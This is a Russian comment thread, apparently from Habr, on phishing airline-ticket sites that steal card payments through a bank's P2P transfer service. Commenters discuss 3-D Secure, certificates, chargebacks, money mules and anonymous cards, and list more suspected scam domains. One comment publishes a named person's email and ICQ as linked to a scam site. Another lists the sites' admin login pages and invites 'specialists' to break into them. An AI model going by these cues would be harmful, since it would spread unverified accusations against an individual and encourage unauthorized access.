В реальности же — они меняют карты так часто что когда выходят на их след — их уже не поймать. Или карта оформлена на бомжа. А те и рады отсидеть на казённых харчах за мошенничество, даже если их найдут. Или даже не на бомжа а на реального человека, только по поддельному паспорту.
Поймать, наверно, можно будет только если в полиции мгновенно получат информацию о совершенной операции снятия денег с банкомата и совершенно случайно рядом проезжал патруль, который мгновенно получил бы эту информацию.NLO
27.09.2016 13:00НЛО прилетело и опубликовало эту надпись здесь
VenomBlood
28.09.2016 02:58+1Ульбрихта 2 года ловили, и поймали по большому счету благодаря его наивным просчетам, а не глубинным анализом, как вы предлагаете. И лоивили его ФБР за гораздо большие дела чем описанное в статье.
HeBonpoc
26.09.2016 18:15+4Лишний повод всегда проверять содержание SMS'ки с паролем. И банкам типа сбера пора уже стать ближе к людям и писать не P2P, а «Перевод на карту N банка 5232 2222....». Попробуйте выписку по карте в сбере посмотреть — одни аббревиатуры. Самое лучшее, увидишь что-то типа AVG34BH-PEREKRESTOK-324356552354.
galaxy
26.09.2016 19:16+2Может они от МПС такую куцую информацию получают?
Меня вот выводит, что в некоторых банках даже обычные транзакции со счета на счет в выписке идут без деталей (ни назначения, ни отправителя, ни номера счета, ни БИК).tyomitch
26.09.2016 19:35+1Я вообще не в курсе технического нутра протоколов МПС, но скорее всего, там основные протоколы остаются неизменными со времён 1980x, когда CNP-транзакции передавались телетайпом и экономить приходилось каждый байт.
vlivyur
27.09.2016 11:21В чём-то лучше, в чём-то хуже. Выписки всё же понятные в Сбере, хоть и не всю информацию показывают.
Позабавили смски от Росбанка: Пароль 123456 для подтверждения операции на сумму 100 рублей. И потом смска: Изменение -100 рублей Остаток 200 рублей Доступно 1200 рублей. И гадай потом что это было.
triton
26.09.2016 18:54+4Вот еще похожие сайты (и еще не заблокированные):
_flying-avia.ru_
_scanner-ticket.ru_
_scanner-aero.ru_Smashrock
27.09.2016 01:24+1Спасибо за сайты, я их проверил по ОГРН и оценил в Web Of Trust (WOT) как мошеннические. Пожалуй, мы все можем их заминусить на WOT, чтобы хоть как-то обезопасить людей.
xbox
27.09.2016 01:27Вот еще похожие сайты (и еще не заблокированные):
_flying-avia.ru_
_scanner-ticket.ru_
_scanner-aero.ru_
Спасибо за добавление. Включил упоминание и разбор этих сайтов в публикацию после подписи UDP2.
TigerClaw
26.09.2016 22:173d secure не обязательно, более того даже CVV2 не обязателен (не вводил когда платил на Амазон или оплачивал в apple сертификат разработчика.
SamsonovAnton
26.09.2016 22:37Первое, что должно было насторожить (точнее, стать стоп-сигналом), — это расположение страницы оплаты на сайте самого получателя. Вводить данные платёжной карты, пусть даже бросовой, можно только на сайте сторонней организации — эквайера. Никакие фреймы и подгрузки страниц [якобы] со сторонних сайтов не допустимы.
persei
26.09.2016 23:56+2На днях платил за LinguaLeo — они именно показывают форму на своем сайте.
Не меньше насторожил аттрибут формы «data-cloudpayment-fake-form»
Для безопасности перевел деньги на неиспользуемую карту и заплатил ей.
Скриншотtendium
27.09.2016 10:35Достаточно большое число компаний размещает платёжные формы на своём сайте. Например, на сайте Аэрофлота платёж проводится по адресу https://pay.aeroflot.ru/
SamsonovAnton
27.09.2016 12:25+1Достаточно большое число компаний размещает платёжные формы на своём сайте.
И это не правильно. Максимум, что должен брать на себя сайт продавца — это первичное перенаправление клиента на сайт той или иной платёжной системы, если их у продавца поддерживается несколько. Ещё куда ни шло, если на сайте продавца расположены только поля для ввода, а обработчиком формы указан сайт эквайера, — но это всё равно вариант на грани фола, потому что, даже если вы доверяете этому сайту (например, это сайт вашего интернет-провайдера), защищён от взлома он наверняка хуже, чем сайт платёжной системы, и вы не можете быть уверены, что где-то там не подгрузился скрипт, отправляющий введённые данные заодно и на сервер мошенников.
Рубрика «Их нравы»Надо мне было купить текст стандарта в одной международной организации (не ISO). Так у них не то что стороннего эквайринга нет — данные банковской карты покупателя, прямо вместе с CVV2, пересылаются по электронной почте и/или по факсу, и сотрудник той организации в ручном режиме снимает деньги, параллельно консультируясь с покупателем при возникновении каких-либо проблем, например если установлен лимит на сумму транзакции. Край непуганых буржуев, ей богу.vikarti
27.09.2016 12:58Несколько лет назад для покупки/продления программы разработчика под устройства Apple надо было им либо факс посылать либо заполненную (в PDF) форму (вроде с подписью). Они ее обработают а потом уже включат. Поддержка Альфа-банка при таких транзакциях сразу звонила с вопросом вида «Это вы сейчас пробуете купить» и одобряли транзакцию только после подтверждения что да, все нормально.
Сейчас все конечно сделано через сайт. Их собственный разумеется, без всяких перенаправлений.
chieftain_yu
27.09.2016 13:17Мвахаха.
А бывают — что по https не пашут — и форма — только их собственная…
mtagir
26.09.2016 22:38Технология 3D Secure существует, но никто не спешит ее внедрять. Вот если бы банки обязали пользоваться технологией, было б намного безопасней для держателей карт, но тогда не будут возможны автоматические списывания на многих сервисах.
У меня была история со взломом моего PSN аккаунта и покупкой игр, с помощью привязанной к ней карты. Я доставал звонками и письмами службу поддержки более полугода, будучи уверенным, что не возможно совершить платеж, не зная ccv2/cvc2 карты, который по Соглашению не хранится на серварах PS. Именно на это я и опирался в своих рассуждениях, пока очередной разговор с оператором-юристом Сбербанка не открыл мне глаза — сервису достаточно знать номер карты, остальное дело порядочности и заинтересованности получателя средств. Возврат средств одобрил головной офис PS в Лондоне, но скорее в качестве исключенияArchiTheCat
28.09.2016 16:26+1Вам очень повезло на самом деле. Выбить что-то у Сони в плане финансов — это очень сложная и нетривиальная задача. Могут пойди на уступки и дать скидку. Могут пойти на уступки и дать какую-то игру, если сильно провинились. А вот вернуть денег — только через главный офис. И очень-очень-очень редко, когда они возращают средства.
mtagir
28.09.2016 20:20Деньги-то я вернул в течении недели через Сбербанк. В ответ Сони заблокировало аккаунт мой, где были игры, которые я покупал сам. В итоге аккаунт разблокировали и отменили покупки совершенные мошенником
vcooking
26.09.2016 22:38Виза, как написано в её правилах возвращает все деньги, если о мошенничестве заявлено сразу (в течении 24 ч), и со сниманием штрафа, если позже. Совсем деньги пропадают, если заявить более чем через месяц.
jabr
27.09.2016 03:44Не в тему мошенничества, но к вопросу о переводах на карту — меня озадачивает такой факт, что p2p перевод вообще как услуга есть у многих (если не у большинства) у всех банков, при этом бесплатный.
Как я понимаю — осуществляя такой перевод в качестве оплаты за что-либо, на самом деле я просто добровольно делаю подарок, и получатель, несмотря на то, что он деньги по факту получил, мне ничем не обязан. Для правильного платежа (с указанием назначения платежа) необходимо оформление платежного поручения (причем за комиссию, я согласен), но вот этого для физ.лиц (в электронном виде через личный кабинет) в 98% банков нет.zIs
27.09.2016 07:15может, меня поправят, но, насколько я знаю, в России физлица вообще не могут принимать коммерческие платежи (платежи за какие-то услуги) от других физлиц. Для этого получатель должен быть оформлен как ИП.
P2P переводы нужны больше для кейсов типа «ты вчера за меня в кафе заплатил, а я тебе сегодня возвращаю на карту». Понятное дело, что у нас эту технологию приспособили, чтобы получать платежи и не платить налоги, но это незаконно.
jabr
27.09.2016 08:55Ну почему, вы же можете мне продать например фотоаппарат, велосипед или а/м. ИП или юрлицо нужно, если осуществляется постояннная (регулярная) деятельность
tendium
27.09.2016 09:14ИМХО, главной дыркой здесь является тот факт, что Тинькофф предоставляет такое апи для платежей. Т.е. покупаешь SSL-сертификат (хотя мошенники даже не заморачиваются этим вопросом на ряде сайтов), делаешь форму, похожую на чей-то платежный гейт, настраиваешься на работу с API тинькофф. И вуаля — греби деньжата. По идее все платежи должны делаться исключительно в рамках сайта платежного гейта. Если требуется стилизация под нужды клиента (чтобы, например, выглядело консистентно с основным сайтом), то она производится на стороне поставщика услуги гейта.
Yngvie
27.09.2016 13:02Да, я кстати очень удивился, что запрос на _https://www.tinkoff.ru/api/v1/payment_commission/ возвращается с заголовками
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, HEAD Access-Control-Allow-Origin: *
palamart
27.09.2016 13:20Вы забываете, что для доступа к API нужно будет договор от юр.лица заключить, а это намного геморройней, чем просто кастомизировать напильником P2P форму.
Главной дыркой, как всегда, является невнимательность людей, когда они (не)видят на 3DSecure форме название не мерчанта, а какой-нибудь Tinkoff P2P.tendium
27.09.2016 14:32Мошенники используют API для P2P. Вы хотите сказать, что они таки заключили договор от юр.лица?
P.S. А уж различать, что там будет за название, это нужно прям разбираться. Я вот, например, до сегодняшнего дня даже и не знал, что P2P в данном случае означает передачу денег с одной карты на другую. Когда уезжал из России, такой сервис еще не был распространён. А там, где я сейчас живу, он по-моему отсутствует как класс.palamart
27.09.2016 14:34+1Я хочу сказать, что они не используют API. Они расковыряли готовый P2P сервис банка и встроили на свою страницу, при этом скрывают вторую карту, в пользу которой списываются деньги.
Я просто предположил, что Вы в теме, поэтому написал, что для использования API данной услуги с банком нужен будет договор.tendium
27.09.2016 15:20Я ж изначально и написал, что дырка начинается с банка Тинькофф, который такое позволяет. А уж какое это API (публичное или внутреннее) — дело вторичное. Как выше написал Yngvie «Access-Control-Allow-Origin: *» — вот дырка.
palamart
27.09.2016 15:30+1Я бы не называл это прям дыркой, ведь попали многие, не только Тинькофф. При определенных действиях мошенников, странице для переводов трудно отличить человека от робота, который чужие данные вставляет.
Мое мнение — дырка начинается с того, что Яндекс.Директ аппрувит такие вот рекламные кампании всяких несуществующих ООО'шек. Но и их понять по идее можно, всю жизнь сегмент продажи авиабилетов считался наименее рисковым, МПС'ы даже пониженные ставки на эквайринг дают таким мерчантам, т.к. фрода нет почти. Нужна более глубокая модерация рекламодателей.
TheShestov
27.09.2016 10:26+4Был заинтригован тем, что: 84 минуты на прочтение
itforge
27.09.2016 11:13+1Вот так можете ещё сайты подобные найти: google: "© 2008-2016 ООО" «моя бронь»
JohnDoee
27.09.2016 11:31http://scaner-avia.ru/ хе пояндексил и нашел сайт с таким же функционалом и дизайном, ни ИНН ни ОГРН не пробивается
antipoff
27.09.2016 12:03«Я ни разу не сталкивался с ситуацией, чтобы Сбербанк в интернете позволял что-то оплатить без проверки 3D Secure» — это не значит, что такого не бывает. есть куча законных примеров.
djhox
27.09.2016 12:30+1Самый главный признак таких «левых» сайтов — отсутствие номера телефона! Он нужен всегда, вы должны быть уверены, что при любой ситуации Вам есть куда обращаться.
tendium
27.09.2016 12:34+2А что мешает разместить левый номер? Вы ведь не будете звонить при оформлении заказа. А потом уже будет поздно.
djhox
27.09.2016 12:38+1Да, но на выше указанных сайтах нет даже «левого» номера. Из опыта работы знаю, что нам звонят многие перед покупкой, именно для проверки реальности компании, все же не 2 копейки отдаете.
Areso
28.09.2016 11:55Учитывая обороты и подход, можно посадить пару девушек-удаленщиц на телефон… За относительно небольшие деньги.
xbox
28.09.2016 15:55+2Если в цепочке на том конце появляется живой человек, то это уже зацепка для следователей.
После первого случая кражи денег и заявления потерпевшего, следователи могут позвонить, записать разговор, постараться вычислить, где находится абонент на том конце провода. И если даже он будет на каком-то далеком острове, это все равно зацепка. Если взять телефониста, то он уже будет соучастником преступления. Такой телефонист за те 100р, которые он получил, не захочет получить срок, и сдаст всю информацию, которой владеет. У телефониста тоже может не быть выходов на главного организатора схемы, но все равно это зацепка.
alpet_m
27.09.2016 12:45-2Меня особенно восхищает, что при массе подобных случаев, банки кичатся своим преимуществом перед криптовалютами, мол для биткойна невозможно отменить транзакцию, если деньги ушли мошенникам. А я ещё ни разу не слышал, чтобы деньги списанные с карт мошенниками, возвращались отправителю. Возможно это какая-то дичайшая редкость, когда пользователь начинает судиться с банком. Сбербанк сейчас и вовсе начал воспринимать кражу средств как данность, и предлагает страховать вклады. Прав Герман Оскарович, биткойн со временем прикончит банки, раз они такие беспомощные и при этом опасные для пользователя.
semb
27.09.2016 13:22+1Вот ещё _pilotavia.ru_
SKolotienko
27.09.2016 16:44А по каким признакам определили, что мошенники? Я дошёл до страницы оплаты, там https с сертификатом от Let's Encrypt, в коде html не нашёл подозрительных всяких tinkoff card to card.
semb
27.09.2016 16:47Возможно, этот сайт действительно продаёт билеты. А мошенники использовали его html и реквизиты юрлица для своих целей.
semb
27.09.2016 16:54У них почта на _dexavia.ru_, который недоступен. Это подозрительно. Может они временно отключили «специальную» функциональность.
grossws
27.09.2016 19:22+2let's encrypt'овский сертификат, как и любой другой DV, не гарантирует ничего. Он подтверждает только владение доменом. Даже платный DV стоит 5-10 баксов в год, что для мошенников копейки.
Как минимум, для платёжных должен быть OV, от нормального вендора, который гарантирует проверку документов организации. А в идеале — EV, который требует куда большего количества проверок и даёт зелёную плашку в браузере. Жаль, что сейчас часть банков уходит от использования EV.
PayOnline
27.09.2016 15:07+3FYI: Памятка "Как вернуть незаконно списанные денежные средства" со ссылками на законы. Может пригодиться.
Sprinthost
27.09.2016 16:23+8Все сайты, размещенные на нашем хостинге, о которых идет речь в статье, заблокированы.
Мы всегда готовы к сотрудничеству с правоохранительными органами. Надеемся, что справедливость будет восстановлена, а мошенники наказаны.xbox
27.09.2016 16:39+3Все сайты, размещенные на нашем хостинге, о которых идет речь в статье, заблокированы.
Мы всегда готовы к сотрудничеству с правоохранительными органами. Надеемся, что справедливость будет восстановлена, а мошенники наказаны.
Спасибо!
Это реакция провайдера Sprinthost на прочтение этой статьи. Еще четыре сайта заблокировано. Отдельного обращения к этому провайдеру не было. Это их инициатива. Предлагаю проголосовать положительно за предыдущее соотношение.
Скриншот блокировки одного из сайтов
alx99
27.09.2016 17:48+1Еще немного сайтов:
_avia.netprosolution.co_
_letofly.biz_
в коде указаны контакты, верстальщика
/* Aleksey Skubaev
askubaev@gmail.com
icq — 322253350
а так же уже закрытые, но не упомянутые ранее сайты
_kyda-letim.com_
_vsembilet.com_
Grin07
27.09.2016 18:14Что примечательно сайты сделаны на разных движках =)
Я думаю что тут есть специалисты которые могут открыть админку и посмотреть количество операций сайта.
_letofly.biz/admin.php _travelbileti.ru/admin/login.php _pilotavia.ru/admin.php
Используемы движки сайтов: InstantCMS и DataLife Engine
zitron
27.09.2016 18:19+4Волею служебных обязанностей занесло с неделю назад на онлайн-семинар от фирмы Group-IB, и вот надо же, ровно про ваши случаи зашла речь.
Если коротко, то ребята наваяли (и продают) целый модульный кит по поиску таких фишинговых сайтов, работают на разных этапах, начиная от регистрации домена, получения сертификата SSL, до раскрутки в баннерных сетях.
Конкретно по авиа-билетам совместно с проектом aviasales.ru они создали сайт http://настоящийбилет.рф/ на котором как раз можно пробить подозрительный ресурс.
Чтобы не быть тем рабиновичем, который изображал Карузо, я на этом остановлюсь, подробности можете узнать в указанных фирмах.xbox
27.09.2016 18:51+2Список из более 400 заблокированных сайтов по продаже авиабилетов впечатляет. Но требование вводить свой email, чтобы проверить сайт в черном списке, на мой взгляд контр продуктивно. Зачем это делать? Это замедляет работу. Нормальный подход — ввел адрес, сразу на экране получил ответ. Ждать хотя бы 30 секунд пока придет письмо — это непозволительная роскошь в текущей ситуации. А ведь нужно еще получить доступ к проверке своей почты, — это не всегда возможно.
А главное, подкованные пользователи, стараются не оставлять свои адреса без необходимости. Тем более сайт малоизвестный и потенциальный пользователь может подумать, что это кто0то таким образом собирает базу данных для специализированного спама.
Таким образом бОльшая часть потенциальных пользователей настоящийбилет.рф просто не будет им пользоваться. На мой взгляд, поле email в форме нужно убрать для простых проверок. Можно его оставить, сделав не обязательным, если кто-то из пользователей сам захочет получить обратную связь через почту, при заявлении о новом сайте.
А вообще можно еще проще сделать. Форму для проверки убрать. Список заблокированных сайтов вывести на отдельную страницу, на которой сделать удобный фильтр/поиск по названию. А форму оставить только для заявления о новых сайтах.
ReSpown
27.09.2016 18:32Есть некая статья на очень «хорошем» ресурсе, на котором очень подробно расписаны ОРД (оперативно-розыскные действия) и ОРМ (оперативно-розыскные мероприятия) по случаям мошенничества. Полезно для ознакомления многим здесь. Америки конечно не открываю, но так на всякий случай.
https://www.dublikat.in/threads/kak-zhe-lovjat-moshennikov-v-realnom-mire.41169/
Автору статьи — писать заявление в полицию надо сразу же, причем настаивая, что был нанесён СУЩЕСТВЕННЫЙ имущественный, материальный ущерб, для того что бы завели УД (уголовное дело).
В противном случае будут отписки, типа, при проведении спецмероприятий, лицо или лица свершившие правонарушение НЕ выявлены )))
В данном случае, ещё не факт, что машина правосудия заработает, всё зависит от того кого кинули.
grossws
27.09.2016 19:41+7Сайт использует защищенное соединение и сертификат от Let's Encrypt. Интересная особенность, — сертификат выпущен сроком на три месяца. Это, наверное, для экономии? Реально оценивают срок жизни такого сайта.
@xbox, lets encrypt — сервис автоматизированного получения бесплатных DV-сертификатов от Internet Security Research Group, в которую входят представители Mozilla Foundation, EFF, Akamai, Cisco, CoreOS и др.
У них стандартный срок действия ограничен 3 месяцами (и планировалось дальнейшее уменьшение срока), чтобы подтолкнуть пользователей к автоматизации обновления сертификатов ибо "ban humans" — очень важная вещь для стабильной работы чего угодно.
centrist
28.09.2016 00:21главное что они ничего не проверяют для выдачи сертификата, кроме того, что сайт реально отвечает по заявленному имени. Получить такой — дело минуты.
Очередной вопрос о безопасности сертификатов, выдаваемых большими дядями кому попало…grossws
28.09.2016 01:31+1Это не проблема сертификатов и PKI как системы. До этого тоже не составляло никакого труда получить DV-сертификат за $5.
Если вы вводите данные карты не на сайте доверенного payment gate или банка — вы, извините за выражение, идиот. И те, и другие используют, как правило, EV.
Исключениями являются всякие странные атласы типа Билайна, которые при оплате через их payment gate используют OV и в договоре-оферте заявляют, что "не гарантирует обеспечение конфиденциальности информации и данных об Держателе Банковской карты и/или Абоненте и не несет за это никакой ответственности" (цитата из пункта 6.4 договора-оферты).
centrist
28.09.2016 01:46+1эта ситуация высвечивает проблему системы из браузеров, SSL и PKI. Она позиционируется как система, в которой можно доверять каким-то образом проверенному владельцу сертификата. При этом на самом деле проверенным он не является.
grossws
28.09.2016 02:00Почему не является? Является проверенным именно в той мере, которая указана в сертификате при условии доверия CA.
Если в сертификате указаны только
CNиSAN(обычное явление для DV), то это означает только то, что ваш трафик не перехватывает/подменяет третья сторона (при соблюдении владельцем сертификата соотв. правил безопасности).
Если в сертификате указаны ещё другие поля (например,
O), то вы можете быть уверены, что организацию проверили в той мере, которая указана в политике выдачи сертификатов соответствующего CA, ссылка на которую, как правило, имеется в самом сертификате.
Естественно, читаете эти 20 страниц текста убеждаетесь, что вас устраивает необходимая степень проверки и действуете в соответствии с этим.
Или опираетесь на то, что EV выдают гарантируя довольно высокий минимальный порог проверки.
centrist
28.09.2016 02:36Не является тем, что позиционируется производителями браузеров, я ведь это написал. Система включает в себя все CA, установленные в браузерах или ОС (для браузеров, использующих хранилище в ОС) по умолчанию, и только их.
Пользователь ожидает от https сайтов с зеленым замочком определенных вещей.Ivan22
28.09.2016 09:39в итоге самым надежным является старый добры платежный толстый клиент! Да еще и ключем на дискетке! Думаю скоро увидим супер-стартапы на эту тему :)))
centrist
28.09.2016 17:25+1Если вернут деньги, то к надежности системы карт вопросов, в общем, нет.
Вопрос вот в чем — человек нагуглил в яндексе какой-то сайт. Выглядит нормально, оплата по карточке, как обычно. Как понять что он левый? Яндекс и гугл рекламщики взяли с преступников копеечку и умыли руки. HTTPS не значит ничего. Списание с карточки -стандартное. В интернете теперь опасно что-то покупать?
maa_boo
28.09.2016 11:18А что, разве карты можно открыть на анонима?
Или как обычно — преступники могут, а добропорядочные — нет?Areso
28.09.2016 12:02Неименные дебетовые карты, некоторые, даже, сюрприз-сюрприз, с возможностью пополнения баланса. Другие с фиксированным предоплаченным балансом.
Могут-не могут — вопрос законов в отдельно взятой юрисдикции.
Регулярно такими пользуюсь.maa_boo
28.09.2016 12:15Например? У меня (неименная дебетовая) мало того, что спрашивали документы при выдаче карты, так и при каждом пополнении.
Areso
28.09.2016 13:05Например, у меня в штатах есть карты, которыми я оплачиваю некоторые покупки, где не-Американские карты (а также оплата ими через Пэйпол и т.п.) не принимаются в принципе. Я захожу на сайт, покупаю дебетовые предоплаченные карты небольшим номиналом в 10...20 долларов даже не заполняя Фамилия-Имя.
С большим номиналом нужно вводить Фамилию-Имя, но документы не просят (что мешает ввести John Smith?)… При пополняемых картах местами требуются документы, но там зависит от лимитов, а проверка… как вы проверите документы, которые вам пришлют по электронной почте? При определенных лимитах нужно нотариальное заверение присланных бумажно документов, но я такими суммами еще не оперировал.maa_boo
28.09.2016 14:16С трудом верится, что в Штатах, где есть SAR/CTR можно завести карту и снимать с неё деньги в неограниченных количествах при том, что большинство транзакций будут из-за границы.
Areso
28.09.2016 15:08Насчет снимать — не знаю (в АТМ не снимал), но тратить — запросто.
Про неограниченные количества я написал чуточку выше ровно обратное.
В моем случае, я так предполагаю, для штатовских банков все выглядит органично — карточку пополняет штатовское юрлицо. В свою очередь, юр.лицо получает за эту услугу деньги — уже не штатовские.
chieftain_yu
28.09.2016 13:25Типа анонима — можно.
Есть подарочные карты.
Я, Васисуалий Лоханкин, оформляю такую карту, получаю ее с предъявлением своих документов — после чего передаю ее неизвестому для банка лицу, которое ее использует как хочет. После чего теряюсь в мире.
Есть карты с возможностью пополнения — то есть на нее вполне можно выводить какие-то средства.
Ессно, там есть некие ограничения по поступающим и расходуемым средствам, но в целом вопрос решаемый. Опять же — мне как Васисуалию Лоханкину никто не запрещал приобресть произвольное количество таких карт, а тому, кому я эти карты отдал — использовать целый пул таких карт (в том числе — от Никифора Ляпис-Трубецкого).
vikarti
28.09.2016 18:51можно. если рассматривать преступный вариант — ссылка на dublikat.in тут уже была. заходим и смотрим на рекламные баннеры.
если хотя бы серые варианты рассматривать — на plati.ru можно купить предоплаченные гифт-карты (скажут номер и все что полагается), используется например в некоторых случаях для создания аккаунта в американском AppStore (если нормальной американской карты нет а хочется почему то)
lehha
28.09.2016 13:42Самый интересный ответ на вопрос — куда уходят деньги — на дропов. Сейчас куча объявлений в вк, где предлагают использовать твою карточку для получения переводов за 30% от суммы. Сливают до ляма, при встрече отдаешь им 70%, остальное себе.
Однако такого дропа ловят через некоторое время и сажают. А «вон тот Вася попросил принять платеж, я ему 70% отдал» к делу не пришьешь и в итоге их так же не могут поймать…
formasha
28.09.2016 14:51+2UDP4: Информация, для тех, кто спрашивал.
На данный момент деньги не вернули ни по платежам, которые ушли на чужие карты, ни по платежам, которые ушли в Яндекс.Директ. (Про платежи в Яндекс.Директ в банк было подано заявление менее через за 24 часа после списаний). Официального ответа от Сбербанка нет (15 дней еще не прошло). Сегодня для следователя делали бумажную выписку в отделении Сбербанка. Суммы списаны. Про получателей платежей в выписке никакой дополнительной информации нет.
Поскольку из поста не совсем ясно, куда обращался автор или знакомый автора («письма в Яндекс») — прокомментирую ситуацию со стороны Яндекс.Денег. Мы знаем об этом инциденте, служба безопасности Яндекс.Денег на основании запроса от владельца карты сразу приняла все возможные с нашей стороны меры к кошелькам и картам, которые могли быть использованы в мошеннической схеме с билетами. Поскольку в описанной истории есть все признаки преступления, обращение в полицию — правильно и совершенно необходимо. И конечно же Яндекс.Деньги отдадут имеющуюся у нас информацию представителям правоохранительных органов в рамках уголовного дела.
На основании заявления клиента банк-эмитент карты обычно начинает инцидентный цикл (проще говоря, оспаривает операции) по правилам международных платежных систем (MasterCard, Visa), и результатом этого цикла (занимает подчас несколько месяцев) может быть возврат денег, списанных без 3-Ds.xbox
28.09.2016 17:07+2Поскольку из поста не совсем ясно, куда обращался автор или знакомый автора («письма в Яндекс») — прокомментирую ситуацию со стороны Яндекс.Денег. Мы знаем об этом инциденте, служба безопасности Яндекс.Денег на основании запроса от владельца карты сразу приняла все возможные с нашей стороны меры к кошелькам и картам, которые могли быть использованы в мошеннической схеме с билетами. Поскольку в описанной истории есть все признаки преступления, обращение в полицию — правильно и совершенно необходимо. И конечно же Яндекс.Деньги отдадут имеющуюся у нас информацию представителям правоохранительных органов в рамках уголовного дела.
Спасибо за комментарий.
Обращение от потерпевшего было в службу поддержки Яндекс.Денег через сайт, в разделе сообщить о мошенничестве. Номер обращения 4410613, отправлено ночью 21.07.16. По этому обращению позже в разные дни через электронную почту было направлено четыре дополнительных письма. Вся имеющаяся информация о мошеннических операциях была передана Яндексу. На все письма были получены корректные ответы от Яндекса. Как я уже писал здесь, на все запросы ответ от Яндекса приходил очень быстро, даже в ночное время.
К Яндексу, как к компании, а также к сотрудникам Яндекса никаких претензий нет и не было. При отправке запросов была только попытка попробовать по горячим следам найти похищенные средства и, когда из ответов Яндекса выяснилось, что деньги уже были потрачены и вернуть их не удалось, последующие обращения потерпевшего были направлены на то, чтобы на основании имеющейся информации сделать всё для осложнения мошенникам возможности продолжать свою деятельность (блокировка аккаунтов Яндекс.Директа, исключение из выдачи, блокировка кошельков, блокировка указанных в статья карт, выпущенных Яндекс.Банком итп).
Также было обращение в банк потерпевшего, — в Сбербанк 20.09.16 и дополнительное 21.09.16.
21.09.16 было подано заявление в полицию. Сейчас назначен следователь и ведется расследование.
21.09.16 было подано заявление хостинг-провайдеру firstVDS, по результатам которого мошеннический сайт заблокирован.
Дополнительно было обращение в банк ТКС с целью их предупредить о том, что их сервис P2P используется на мошенническом сайте. (Деньги в описываемом в статье случае похитили через сервис P2P другого банка, а ТКС был просто поставлен в известность, чтобы предупредить похожие мошеннические операции при продаже авиабилетов).
Были еще несколько менее значимых обращений в различные интернет-сервисы с целью внести указанные в статье сайты в базы фишинговых сайтов и исключить их из поисковой выдачи и из рекламных блоков.
bosom
28.09.2016 15:58Хочется добавить еще то что пользуясь услугами сбербанка вы подвергаете себя максимальной опасности. В полиции лежат сотни тысяч заявлений пострадавших клиентов сбербанка. Никто никогда не получит возмещения убытков. Начните с того что не пользуйтесь сбербанком перейдите в нормальный банк и даже если вы лоханётесь вы успеете заблокировать карту, а если не успеете то по страховке получите возмещение! и это не дорого, в нормальных коммерческих банках цены на обслуживание карт часто дешевле чем в сбере. Не пишу название банков чтобы не показаться что я кого-то рекламирую. Я просто знаю множество пострадавших клиентов сбера и в курсе как мошенники пользуются сбером чтобы обобрать…
vlivyur
29.09.2016 14:03В чём проблема у Сбера?
bosom
29.09.2016 14:17Вас что в гугле и яндексе забанили?
Даже если я не буду говорить своё объективное мнение о сбере тут, любой желающий может посмотреть статистику банков, статистику того с чем любят баботать мошенники, статистику самых не защищенных банков и банкоматов — сбер в топе.
Даже если вы не смогли прочесть данную статью и не считаете проблемой сбербанка, то что клиент сбербанка не смог быстро дозвониться до колцентра чтобы заблокировать карту, то уверяю вас, во вменяемом банке, если клиент докажет что он был в самолёте или автобусе и не делал платежи, то ему деньги вернут. А вот в сбербанке на клиента подаст в суд и через приставов его оберут вместе с мошенниками (в случае если у вас кредитка и преступники её обнулили выплачивать будете вы сберу — и мошенники в плюсе и сбер радуется).
В данной теме лучше не надо о сбере, у меня куча знакомых от сбера пострадало на сумму почти пол милиона рублей. Не верите, становитесь клиентом сбербанка!
basyan44
28.09.2016 15:59Вроде надеешься на 3-D Secure, а оказывается все это ерунда, на Aliexpress так же все платежи без 3-D Secure проходят. Хочется все же предъявить претензии банку(ам), мы им доверяем свои деньги а они вот так вот их защищают.
land_driver
28.09.2016 15:59Вот еще похожий сайт, на этот раз по оплате штрафов, выскакивает в топе Яндекса, ссылку на сайт не даю, чтобы не повышать его рейтинг, здесь в статье про него написано http://photo-drive.ru/wordpress/chestnyj-otem-deneg-u-naseleniya-v-vide-shtrafov-gibdd/
yTom48
28.09.2016 15:59Предлагаю завести сайт для проверки подобных сайтов. Кто за? Заодно пополнять там список мошенников или подозрительных сайтов.
Rumlin
28.09.2016 16:21Есть же WOT www.mywot.com
Ставится расширение в браузер и проверка происходит автоматически.xbox
28.09.2016 17:36+1В моей практике был случай, когда клиент компании позвонил и пожаловался, что не может зайти на сайт компании. Когда стали разбираться, выяснилось, что у клиента в браузере установлен плагин, проверяющий сайты по базе WOT. Сайт был абсолютно чистый, без малейших признаков, которые позволяли его в чем-то нехорошем заподозрить. Обычный интернет-магазин компании, работающей около 15 лет, с сайтом работающим более 10 лет.
Оказалось, что в базе WOT был один (!) негативный отзыв о сайте. Отзыв вообще был один. И это даже был не отзыв, где можно было бы что-то прочитать по сути претензии, а это была просто негативная оценка. В результате все, кто использовали плагины WOT не могли попасть на нормальный сайт. С отзывом не помню, как, но разобрались. Пришлось на разбирательства и исправление тратить время. С тех пор я очень насторожено отношусь к базе WOT. Конкуренту любой компании достаточно щелкнуть в своем плагине один раз, а компании потом разбирайся, что это было.
evvik
28.09.2016 15:59Очень интересное расследование. Возник вопрос — а кроме Сбера с карт каких банков были выведены деньги? Есть такая информация?
yTom48
28.09.2016 19:12+1Гугл на поисковой запрос «дешевые авиабилеты» на первой страницы выдачи отображает эту новость, а яндекс нет :(
Ventur0
28.09.2016 20:54Самое забавное, что если бы мошенники не поленились и продавали настоящие билеты, а списывали деньги с карты не на следующий день, а, скажем, через 1-2 недели, то вся схема успешно работала бы и по сей день.
jabr
29.09.2016 02:41+1Это как, простите? Мошенники-меценаты?
Где бы они брали настоящие билеты по таким ценам, да еще с отсрочкой платежа на 1-2 недели?Ventur0
29.09.2016 11:26Я имел в виду не отсрочку по оплате билета, а отсрочку по не авторизованному списанию с карты.
Схема такая — человек заходит на сайт, выбирает билет, сразу его оплачивает и получает.
Мошенники продают реальный билет, который покупается у стороннего оператора.
Чтобы цены были реально ниже, они могут даже субсидировать разницу (1-3 тысячи рублей).
Потом по прошествии 2х недель начинают делать мошеннические списания по своей схеме- и клиент вряд ли догадается, что это они, ведь он за 2 недели может пользоваться картой где угодно еще.
MaxF
28.09.2016 21:59-1Как насчет написать «охотника», который выискивает подобные сайты (и проверяет поступившие жалобой через веб форму) и если подтверждается угроза, автоматически отправляет нужные заявления в органы и провайдеру?
zarthur
28.09.2016 22:28интересно, как они потом наличат деньги? или я.мани без верификации карты выдаёт?
cigulev
30.09.2016 16:37Карты может и с верификацией, но на подставное лицо, на так называемого «дропа». Такие карты продают на хакерских форумах. У Яндекс.Денег счет карты привязан к счету в аккаунте и все деньги можно без проблем обменять на другую валюту через множество онлайн-обменников.
PayOnline
